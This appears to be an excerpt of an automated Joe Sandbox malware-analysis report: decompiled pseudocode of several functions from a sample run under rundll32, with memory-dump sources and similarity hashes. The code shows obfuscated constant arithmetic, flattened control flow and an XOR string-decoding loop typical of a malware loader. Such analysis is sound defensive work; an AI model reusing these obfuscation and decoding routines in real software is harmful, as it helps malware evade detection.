                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t133;
                                                                                                                      				void* _t137;
                                                                                                                      				signed int _t139;
                                                                                                                      				signed int _t140;
                                                                                                                      				signed int _t141;
                                                                                                                      				intOrPtr _t158;
                                                                                                                      				intOrPtr* _t159;
                                                                                                                      				intOrPtr* _t160;
                                                                                                                      				void* _t161;
                                                                                                                      
                                                                                                                      				_t158 =  *0x365c94; // 0x0
                                                                                                                      				_v8 = 0x584755;
                                                                                                                      				_t137 = __ecx;
                                                                                                                      				_t2 =  &_v8; // 0x584755
                                                                                                                      				_t159 = _t158 + 0x230;
                                                                                                                      				_t139 = 0x64;
                                                                                                                      				_v8 =  *_t2 * 0x67;
                                                                                                                      				_v8 = _v8 + 0xffff4b67;
                                                                                                                      				_v8 = _v8 ^ 0xe76daef6;
                                                                                                                      				_v8 = _v8 ^ 0xc4ee506c;
                                                                                                                      				_v28 = 0x9e8b87;
                                                                                                                      				_v28 = _v28 + 0x75d;
                                                                                                                      				_v28 = _v28 / _t139;
                                                                                                                      				_v28 = _v28 ^ 0x00079f8c;
                                                                                                                      				_v24 = 0xc311ab;
                                                                                                                      				_v24 = _v24 + 0xffffbeea;
                                                                                                                      				_v24 = _v24 | 0xf92f35a0;
                                                                                                                      				_v24 = _v24 ^ 0xf9e35170;
                                                                                                                      				_v44 = 0x977698;
                                                                                                                      				_v44 = _v44 + 0x51f5;
                                                                                                                      				_v44 = _v44 ^ 0x0096f96a;
                                                                                                                      				_v32 = 0xe7cab8;
                                                                                                                      				_v32 = _v32 | 0xaa1208f4;
                                                                                                                      				_t140 = 0x17;
                                                                                                                      				_v32 = _v32 / _t140;
                                                                                                                      				_v32 = _v32 ^ 0x076e046c;
                                                                                                                      				_v12 = 0x2eec3f;
                                                                                                                      				_v12 = _v12 + 0xffffb819;
                                                                                                                      				_v12 = _v12 + 0xffff37c9;
                                                                                                                      				_t141 = 0x68;
                                                                                                                      				_v12 = _v12 / _t141;
                                                                                                                      				_v12 = _v12 ^ 0x000eef91;
                                                                                                                      				_v56 = 0x530307;
                                                                                                                      				_v56 = _v56 | 0x0fbda9c8;
                                                                                                                      				_v56 = _v56 ^ 0x0ffdd502;
                                                                                                                      				_v52 = 0x5d35c5;
                                                                                                                      				_v52 = _v52 + 0xd27c;
                                                                                                                      				_v52 = _v52 ^ 0x0055f8de;
                                                                                                                      				_v48 = 0x6ef6d5;
                                                                                                                      				_v48 = _v48 >> 1;
                                                                                                                      				_v48 = _v48 ^ 0x0035703d;
                                                                                                                      				_v16 = 0x82f5d;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 + 0xa18d;
                                                                                                                      				_v16 = _v16 + 0xffffcd20;
                                                                                                                      				_v16 = _v16 ^ 0x05eb1b3e;
                                                                                                                      				_v20 = 0xcf26b;
                                                                                                                      				_v20 = _v20 | 0xbebffeb7;
                                                                                                                      				_v20 = _v20 ^ 0xbebf7f31;
                                                                                                                      				_v60 = 0x60d0b7;
                                                                                                                      				_v60 = _v60 >> 2;
                                                                                                                      				_v60 = _v60 ^ 0x0017c790;
                                                                                                                      				_v40 = 0xb2c22;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f8cde;
                                                                                                                      				_v40 = _v40 + 0xffffbcf4;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f98f1;
                                                                                                                      				_v36 = 0x14b711;
                                                                                                                      				_v36 = _v36 >> 0xd;
                                                                                                                      				_v36 = _v36 | 0x6b3fd2c1;
                                                                                                                      				_v36 = _v36 ^ 0x6b3a1312;
                                                                                                                      				while(1) {
                                                                                                                      					_t160 =  *_t159;
                                                                                                                      					if(_t160 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
                                                                                                                      						L4:
                                                                                                                      						 *_t159 =  *_t160;
                                                                                                                      						_t133 = E003468DE(_v20, _v60, _v40, _v36, _t160);
                                                                                                                      						_t161 = _t161 + 0xc;
                                                                                                                      					} else {
                                                                                                                      						_t133 = E00345E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
                                                                                                                      						if(_t133 != _v8) {
                                                                                                                      							_t159 = _t160;
                                                                                                                      						} else {
                                                                                                                      							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
                                                                                                                      							E0034F88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
                                                                                                                      							E00354DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
                                                                                                                      							_t161 = _t161 + 0x14;
                                                                                                                      							goto L4;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t133;
                                                                                                                      			}



























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?.$UGX
                                                                                                                      • API String ID: 0-3695597265
                                                                                                                      • Opcode ID: 98ddda2cffde31070f97ce88449be83d194263a009fd023fdc502495e24e1397
                                                                                                                      • Instruction ID: c782ebab07bf12a2333e5166fa068ee3e3866fd4179d1fa5f564ea3e11f14bdf
                                                                                                                      • Opcode Fuzzy Hash: 98ddda2cffde31070f97ce88449be83d194263a009fd023fdc502495e24e1397
                                                                                                                      • Instruction Fuzzy Hash: 9E511172D01309EBCB59CFA5D98A9DEBFB2FF48318F208059D502BA260D7B51A45CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E003444FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				void* _t110;
                                                                                                                      				signed int _t116;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				void* _t138;
                                                                                                                      				signed int* _t141;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t138 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t110);
                                                                                                                      				_v584 = 0x353aee;
                                                                                                                      				_t141 =  &(( &_v596)[5]);
                                                                                                                      				_t126 = 0x2b8a3ea;
                                                                                                                      				_t135 = 0x6c;
                                                                                                                      				_v584 = _v584 * 0x28;
                                                                                                                      				_v584 = _v584 | 0xfff7ffbb;
                                                                                                                      				_v584 = _v584 ^ 0xfff7ffab;
                                                                                                                      				_v560 = 0x47639d;
                                                                                                                      				_v560 = _v560 + 0xffffee4d;
                                                                                                                      				_v560 = _v560 ^ 0x00482f45;
                                                                                                                      				_v568 = 0x9954f4;
                                                                                                                      				_v568 = _v568 >> 4;
                                                                                                                      				_v568 = _v568 << 0xe;
                                                                                                                      				_v568 = _v568 ^ 0x655e48ca;
                                                                                                                      				_v572 = 0x27eb8;
                                                                                                                      				_v572 = _v572 << 0xf;
                                                                                                                      				_v572 = _v572 | 0x08d3f6f7;
                                                                                                                      				_v572 = _v572 ^ 0x4e414fab;
                                                                                                                      				_v572 = _v572 ^ 0x7197c1a5;
                                                                                                                      				_v592 = 0xd88b27;
                                                                                                                      				_v592 = _v592 | 0xcb2a0632;
                                                                                                                      				_v592 = _v592 ^ 0x61d9313a;
                                                                                                                      				_v592 = _v592 * 0x31;
                                                                                                                      				_v592 = _v592 ^ 0x90d0f268;
                                                                                                                      				_v564 = 0x1e6f95;
                                                                                                                      				_v564 = _v564 + 0xffffd458;
                                                                                                                      				_v564 = _v564 ^ 0x0016c965;
                                                                                                                      				_v556 = 0x7ec301;
                                                                                                                      				_v556 = _v556 / _t135;
                                                                                                                      				_v556 = _v556 ^ 0x0008e3f1;
                                                                                                                      				_v576 = 0xe82a72;
                                                                                                                      				_v576 = _v576 >> 7;
                                                                                                                      				_t116 = _v576;
                                                                                                                      				_t136 = 0x3f;
                                                                                                                      				_t134 = _t116 % _t136;
                                                                                                                      				_v576 = _t116 / _t136;
                                                                                                                      				_v576 = _v576 * 0x66;
                                                                                                                      				_v576 = _v576 ^ 0x00094998;
                                                                                                                      				_v596 = 0x9d9cf;
                                                                                                                      				_v596 = _v596 + 0xffff3374;
                                                                                                                      				_v596 = _v596 ^ 0xdf943dc0;
                                                                                                                      				_v596 = _v596 ^ 0x9d51af04;
                                                                                                                      				_v596 = _v596 ^ 0x42c0e9a6;
                                                                                                                      				_v580 = 0x1688bd;
                                                                                                                      				_v580 = _v580 >> 0xa;
                                                                                                                      				_v580 = _v580 + 0xf36b;
                                                                                                                      				_v580 = _v580 * 0x11;
                                                                                                                      				_v580 = _v580 ^ 0x001dff3c;
                                                                                                                      				_v588 = 0xc39d29;
                                                                                                                      				_v588 = _v588 + 0xc15a;
                                                                                                                      				_t120 = _v588 * 0x65;
                                                                                                                      				_v588 = _t120;
                                                                                                                      				_v588 = _v588 << 0x10;
                                                                                                                      				_v588 = _v588 ^ 0x49a37055;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x10fdd0e) {
                                                                                                                      						if(_t126 == 0x1b35a13) {
                                                                                                                      							return E00359045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
                                                                                                                      						}
                                                                                                                      						if(_t126 != 0x2b8a3ea) {
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						_t134 =  &_v552;
                                                                                                                      						_t120 = E00361310(_v584,  &_v552, _v560, _v568, _v572, _v592);
                                                                                                                      						_t141 =  &(_t141[4]);
                                                                                                                      						_t126 = 0x10fdd0e;
                                                                                                                      					}
                                                                                                                      					_push(_t126);
                                                                                                                      					_t134 =  &_v520;
                                                                                                                      					_t120 = E0034AC8C(_v564,  &_v520, _v556, _v576);
                                                                                                                      					_t141 =  &(_t141[3]);
                                                                                                                      					_t126 = 0x1b35a13;
                                                                                                                      					L6:
                                                                                                                      				} while (_t126 != 0x712552c);
                                                                                                                      				return _t120;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*
                                                                                                                      • API String ID: 0-2167228428
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: 76538e3349df41e2eca877672b6d78042ed14e1399c99fa54ba9a1c9f7b69877
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: 1E5141714083419FC749DF21C98A81FBBE1FBD8748F505A1DF09AAA221D7B19A49CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00361993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				intOrPtr _t138;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v52 = 0x104;
                                                                                                                      				_push(0x104);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(0x104);
                                                                                                                      				_v68 = 0x5658b2;
                                                                                                                      				_t138 = 0;
                                                                                                                      				_v64 = 0x871b59;
                                                                                                                      				_v60 = 0xa8976a;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v40 = 0xee5304;
                                                                                                                      				_v40 = _v40 >> 0xa;
                                                                                                                      				_v40 = _v40 ^ 0x00002b94;
                                                                                                                      				_v24 = 0xe2229b;
                                                                                                                      				_v24 = _v24 >> 2;
                                                                                                                      				_v24 = _v24 << 0xa;
                                                                                                                      				_v24 = _v24 ^ 0xe22b2fd9;
                                                                                                                      				_v8 = 0x13a34a;
                                                                                                                      				_t126 = 0x7b;
                                                                                                                      				_v8 = _v8 * 0x58;
                                                                                                                      				_v8 = _v8 * 0x7c;
                                                                                                                      				_v8 = _v8 >> 6;
                                                                                                                      				_v8 = _v8 ^ 0x01172ec8;
                                                                                                                      				_v16 = 0x4f354;
                                                                                                                      				_t127 = 0x1c;
                                                                                                                      				_v16 = _v16 / _t126;
                                                                                                                      				_v16 = _v16 | 0x38cda962;
                                                                                                                      				_v16 = _v16 << 7;
                                                                                                                      				_v16 = _v16 ^ 0x66d4d439;
                                                                                                                      				_v12 = 0x949837;
                                                                                                                      				_v12 = _v12 ^ 0x28b93813;
                                                                                                                      				_v12 = _v12 + 0xffff414d;
                                                                                                                      				_v12 = _v12 + 0xcc4e;
                                                                                                                      				_v12 = _v12 ^ 0x282f8cad;
                                                                                                                      				_v44 = 0x4b103d;
                                                                                                                      				_v44 = _v44 + 0xffffdccd;
                                                                                                                      				_v44 = _v44 ^ 0x0043fba2;
                                                                                                                      				_v28 = 0xbeb96;
                                                                                                                      				_v28 = _v28 + 0xffffd9aa;
                                                                                                                      				_v28 = _v28 >> 0xd;
                                                                                                                      				_v28 = _v28 ^ 0x000a38bb;
                                                                                                                      				_v48 = 0xb1bdc9;
                                                                                                                      				_v48 = _v48 + 0x24fd;
                                                                                                                      				_v48 = _v48 ^ 0x00b0c363;
                                                                                                                      				_v36 = 0x53e429;
                                                                                                                      				_v36 = _v36 + 0xffff530c;
                                                                                                                      				_v36 = _v36 / _t127;
                                                                                                                      				_v36 = _v36 ^ 0x0005d2bf;
                                                                                                                      				_v20 = 0xb0734b;
                                                                                                                      				_v20 = _v20 | 0x98e9e8ae;
                                                                                                                      				_v20 = _v20 + 0x857e;
                                                                                                                      				_v20 = _v20 << 3;
                                                                                                                      				_v20 = _v20 ^ 0xc7d86034;
                                                                                                                      				_v32 = 0x655a5c;
                                                                                                                      				_v32 = _v32 >> 8;
                                                                                                                      				_v32 = _v32 | 0x0e60c7ff;
                                                                                                                      				_v32 = _v32 ^ 0x0e677ecd;
                                                                                                                      				_t120 = E00353C1B(_t127, _a16, _v40);
                                                                                                                      				_t137 = _t120;
                                                                                                                      				if(_t120 != 0) {
                                                                                                                      					_t138 = E00351785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
                                                                                                                      					E00354DAD(_v48, _v36, _t137, _v20, _v32);
                                                                                                                      				}
                                                                                                                      				return _t138;
                                                                                                                      			}
























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: 1a518f1fda006ab990e831ac6497bb886b3e5d308e9f057727be1adfe564d674
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: E35103B1C00209EBCF49CFE9D98A8DEFBB1FB48704F108159E511B6220D3B55A59CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0034BB4B(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				signed int* _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      				unsigned int* _t65;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t68;
                                                                                                                      				signed int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				unsigned int _t77;
                                                                                                                      				unsigned int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_push( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				_push( *(_t94 + 0x24));
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t50 = E0034CF25( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				 *(_t94 + 0x20) = 0xfe2925;
                                                                                                                      				_t4 =  &(_t50[1]); // 0x4
                                                                                                                      				_t81 = _t4;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
                                                                                                                      				 *(_t94 + 0x1c) = 0x6df10d;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
                                                                                                                      				 *(_t94 + 0x34) = 0x26c28e;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
                                                                                                                      				_t68 =  *_t50;
                                                                                                                      				_t82 =  &(_t81[1]);
                                                                                                                      				_t52 =  *_t81 ^ _t68;
                                                                                                                      				 *(_t94 + 0x24) = _t68;
                                                                                                                      				 *(_t94 + 0x28) = _t52;
                                                                                                                      				_t33 = _t52 + 1; // 0x1
                                                                                                                      				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
                                                                                                                      				_t95 = _t94 + 8;
                                                                                                                      				_t65 = E00353512(_t84);
                                                                                                                      				 *(_t95 + 0x2c) = _t65;
                                                                                                                      				if(_t65 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t80 = _t65;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t66 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t75 =  *_t82;
                                                                                                                      							_t82 =  &(_t82[1]);
                                                                                                                      							_t76 = _t75 ^ _t66;
                                                                                                                      							 *_t80 = _t76;
                                                                                                                      							_t80 =  &(_t80[1]);
                                                                                                                      							_t77 = _t76 >> 0x10;
                                                                                                                      							 *((char*)(_t80 - 3)) = _t76 >> 8;
                                                                                                                      							 *(_t80 - 2) = _t77;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((char*)(_t80 - 1)) = _t77 >> 8;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t65 =  *(_t95 + 0x28);
                                                                                                                      					}
                                                                                                                      					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
                                                                                                                      				}
                                                                                                                      				return _t65;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 84a50e8b692fbb3ceea497525d7a14618e288837bf6162007c63e146fa5db171
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 0F319972A0A3418FD345CF18C88441AFBE0FF98718F414A5CF8899B241DB74EE09CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0034F154(void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				char _v44;
                                                                                                                      				short _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char _v576;
                                                                                                                      				void* _t83;
                                                                                                                      				intOrPtr* _t85;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v56 = 0xd50633;
                                                                                                                      				_v52 = 0xe1ee45;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v24 = 0xad73ca;
                                                                                                                      				_v24 = _v24 ^ 0x73620612;
                                                                                                                      				_v24 = _v24 ^ 0x73c7a99a;
                                                                                                                      				_v32 = 0x597259;
                                                                                                                      				_t89 = 0x52;
                                                                                                                      				_push(_t89);
                                                                                                                      				_v32 = _v32 / _t89;
                                                                                                                      				_v32 = _v32 ^ 0x0009f267;
                                                                                                                      				_v20 = 0xd3cfac;
                                                                                                                      				_v20 = _v20 << 9;
                                                                                                                      				_v20 = _v20 | 0x4896bc35;
                                                                                                                      				_v20 = _v20 ^ 0xef9372aa;
                                                                                                                      				_v28 = 0xdbc61e;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x01b432fd;
                                                                                                                      				_v16 = 0x90d5a3;
                                                                                                                      				_v16 = _v16 + 0xffffb729;
                                                                                                                      				_v16 = _v16 + 0xffff3d25;
                                                                                                                      				_v16 = _v16 ^ 0x0089c5ce;
                                                                                                                      				_v8 = 0xd44b29;
                                                                                                                      				_v8 = _v8 + 0x631b;
                                                                                                                      				_v8 = _v8 | 0x8b07e3a3;
                                                                                                                      				_v8 = _v8 * 0x62;
                                                                                                                      				_v8 = _v8 ^ 0x88a24378;
                                                                                                                      				_v12 = 0x36955e;
                                                                                                                      				_v12 = _v12 + 0xb114;
                                                                                                                      				_v12 = _v12 + 0xffffe207;
                                                                                                                      				_v12 = _v12 ^ 0x0030a900;
                                                                                                                      				_v36 = 0x9daa5e;
                                                                                                                      				_v36 = _v36 + 0xffffbce6;
                                                                                                                      				_v36 = _v36 ^ 0x0093fbb5;
                                                                                                                      				_v40 = 0x60d009;
                                                                                                                      				_v40 = _v40 >> 1;
                                                                                                                      				_v40 = _v40 ^ 0x003d09ba;
                                                                                                                      				_t96 = _v24;
                                                                                                                      				_t83 = E00345C03( &_v576, _v24, _v32);
                                                                                                                      				_pop(0);
                                                                                                                      				if(_t83 != 0) {
                                                                                                                      					_t85 =  &_v576;
                                                                                                                      					if(_v576 != 0) {
                                                                                                                      						while( *_t85 != 0x5c) {
                                                                                                                      							_t85 = _t85 + 2;
                                                                                                                      							if( *_t85 != 0) {
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      							}
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						 *((short*)(_t85 + 2)) = 0;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_push(0);
                                                                                                                      					_push(0);
                                                                                                                      					E0034884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
                                                                                                                      				}
                                                                                                                      				return _v44;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: ee260152eeea39c3354d069ff8cf00b1346f993247e7b4d84b960d8441d7730b
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 0841F276C0121EAFCF19CFE4C84A9EEBBB4FB04304F108199D411B62A0E3B51A44DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
